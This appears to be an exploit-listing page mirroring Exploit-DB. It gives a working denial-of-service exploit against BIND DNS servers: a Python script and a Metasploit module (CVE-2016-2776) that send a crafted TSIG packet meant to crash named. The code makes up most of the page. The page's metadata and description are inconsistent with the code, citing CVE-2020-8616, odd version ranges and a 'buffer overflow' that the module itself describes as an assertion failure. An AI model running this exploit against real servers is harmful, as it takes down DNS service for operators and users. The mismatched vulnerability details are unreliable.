Bind Nuke Exploit

vendor:

BIND

by:

Anonymous

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: BIND

Affected Version From: 9.9.9-P2

Affected Version To: 9.11.25-S1

Patch Exists: YES

Related CWE: CVE-2020-8616

CPE: a:isc:bind:9.9.9-p2

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux, Windows, Mac

2020

Bind Nuke is a buffer overflow exploit that targets the Domain Name System (DNS) server software, BIND. It is a type of attack that sends a maliciously crafted packet to a vulnerable DNS server, which then causes the server to crash or become unresponsive. The exploit works by sending a specially crafted packet to the DNS server, which contains a large amount of data that exceeds the maximum size of the packet. This causes the server to crash or become unresponsive, resulting in a denial of service (DoS) attack.

Mitigation:

The best way to mitigate this vulnerability is to upgrade to the latest version of BIND. Additionally, administrators should ensure that their DNS servers are configured securely and that they are running the latest version of BIND.

Source

Exploit-DB raw data:

import socket
import struct

TARGET = ('192.168.200.10', 53)

Q_A = 1
Q_TSIG = 250
DNS_MESSAGE_HEADERLEN = 12


def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512):
    query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"

    sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1
    tsig_rr = build_tsig_rr(sweet_spot)

    return query_A + tsig_rr

def int16(n):
    return struct.pack("!H", n)

def build_tsig_rr(bind_demarshalled_size):
    signature_data = ("\x00\x00\x57\xeb\x80\x14\x01\x2c\x00\x10\xd2\x2b\x32\x13\xb0\x09"
                      "\x46\x34\x21\x39\x58\x62\xf3\xd5\x9c\x8b\x8f\x65\x00\x00\x00\x00")
    tsig_rr_extra_fields = "\x00\xff\x00\x00\x00\x00"

    necessary_bytes  = len(signature_data) + len(tsig_rr_extra_fields)
    necessary_bytes += 2 + 2 # length fields

    # from sizeof(TSIG RR) bytes conforming the TSIG RR
    # bind9 uses sizeof(TSIG RR) - 16 to build its own
    sign_name, algo_name = generate_padding(bind_demarshalled_size - necessary_bytes + 16)

    tsig_hdr = sign_name + int16(Q_TSIG) + tsig_rr_extra_fields
    tsig_data = algo_name + signature_data
    return tsig_hdr + int16(len(tsig_data)) + tsig_data

def generate_padding(n):
    max_per_bucket = [0x3f, 0x3f, 0x3f, 0x3d, 0x3f, 0x3f, 0x3f, 0x3d]
    buckets = [1] * len(max_per_bucket)

    min_size = len(buckets) * 2 + 2 # 2 bytes for every bucket plus each null byte
    max_size = sum(max_per_bucket) + len(buckets) + 2

    if not(min_size <= n <= max_size):
        raise RuntimeException("unsupported amount of bytes")

    curr_idx, n = 0, n - min_size
    while n > 0:
        next_n = max(n - (max_per_bucket[curr_idx] - 1), 0)
        buckets[curr_idx] = 1 + n - next_n
        n, curr_idx = next_n, curr_idx + 1

    n_padding = lambda amount: chr(amount) + "A" * amount
    stringify = lambda sizes: "".join(map(n_padding, sizes)) + "\x00"

    return stringify(buckets[:4]), stringify(buckets[4:])

if __name__ == "__main__":
    bombita = build_bind_nuke()

    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    s.sendto(bombita, TARGET)
    s.close()

'''
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'timeout'
require 'socket'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Capture
  include Msf::Auxiliary::UDPScanner
  include Msf::Auxiliary::Dos
  include Msf::Auxiliary::Report

  def initialize(info={})
    super(update_info(info,
      'Name'        => 'BIND 9 DoS CVE-2016-2776',
      'Description' => %q{
          Denial of Service Bind 9 DNS Server CVE-2016-2776.
          Critical error condition which can occur when a nameserver is constructing a response.
          A defect in the rendering of messages into packets can cause named to exit with an
          assertion failure in buffer.c while constructing a response to a query that meets certain criteria.

          This assertion can be triggered even if the apparent source address isnt allowed
          to make queries.
      },
      # Research and Original PoC - msf module author
      'Author'      => [ 'Martin Rocha', 'Ezequiel Tavella', 'Alejandro Parodi', 'Infobyte Research Team'],
      'License'     => MSF_LICENSE,
      'References'      =>
        [
          [ 'CVE', '2016-2776' ],
          [ 'URL', 'http://blog.infobytesec.com/2016/10/a-tale-of-dns-packet-cve-2016-2776.html' ]
        ],
      'DisclosureDate' => 'Sep 27 2016',
      'DefaultOptions' => {'ScannerRecvWindow' => 0}
    ))

    register_options([
      Opt::RPORT(53),
      OptAddress.new('SRC_ADDR', [false, 'Source address to spoof'])
    ])

    deregister_options('PCAPFILE', 'FILTER', 'SNAPLEN', 'TIMEOUT')
  end

  def check_server_status(ip, rport)
    res = ""
    sudp = UDPSocket.new
    sudp.send(valid_query, 0, ip, rport)
    begin
      Timeout.timeout(5) do
      res = sudp.recv(100)
    end
    rescue Timeout::Error
    end

    if(res.length==0)
      print_good("Exploit Success (Maybe, nameserver did not replied)")
      else
        print_error("Exploit Failed")
    end
  end

  def scan_host(ip)
    @flag_success = true
    print_status("Sending bombita (Specially crafted udp packet) to: "+ip)
    scanner_send(payload, ip, rport)
    check_server_status(ip, rport)
  end

  def get_domain
    domain = "\x06"+Rex::Text.rand_text_alphanumeric(6)
    org = "\x03"+Rex::Text.rand_text_alphanumeric(3)
    get_domain = domain+org
  end

  def payload
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x01"  # Additional RRs: 1

    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)

    # Aditional records. Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #192 bytes
    query += "\x3d"+Rex::Text.rand_text_alphanumeric(61)
    query += "\x00"

    query += "\x00\xfa" # Type: TSIG (Transaction Signature) (250)
    query += "\x00\xff" # Class: ANY (0x00ff)
    query += "\x00\x00\x00\x00" # Time to live: 0
    query += "\x00\xfc" # Data length: 252

    # Algorithm Name
    query += ("\x3f"+Rex::Text.rand_text_alphanumeric(63))*3 #Random 192 bytes
    query += "\x1A"+Rex::Text.rand_text_alphanumeric(26) #Random 26 bytes
    query += "\x00"

    # Rest of TSIG
    query += "\x00\x00"+Rex::Text.rand_text_alphanumeric(4) # Time Signed: Jan  1, 1970 03:15:07.000000000 ART
    query += "\x01\x2c" # Fudge: 300
    query += "\x00\x10" # MAC Size: 16
    query +=  Rex::Text.rand_text_alphanumeric(16) # MAC
    query += "\x8f\x65" # Original Id: 36709
    query += "\x00\x00" # Error: No error (0)
    query += "\x00\x00" # Other len: 0
  end

  def valid_query
    query = Rex::Text.rand_text_alphanumeric(2)  # Transaction ID: 0x8f65
    query += "\x00\x00"  # Flags: 0x0000 Standard query
    query += "\x00\x01"  # Questions: 1
    query += "\x00\x00"  # Answer RRs: 0
    query += "\x00\x00"  # Authority RRs: 0
    query += "\x00\x00"  # Additional RRs: 0

    # Doman Name
    query += get_domain   # Random DNS Name
    query += "\x00"      # [End of name]
    query += "\x00\x01"  # Type: A (Host Address) (1)
    query += "\x00\x01"  # Class: IN (0x0001)s
  end

end
'''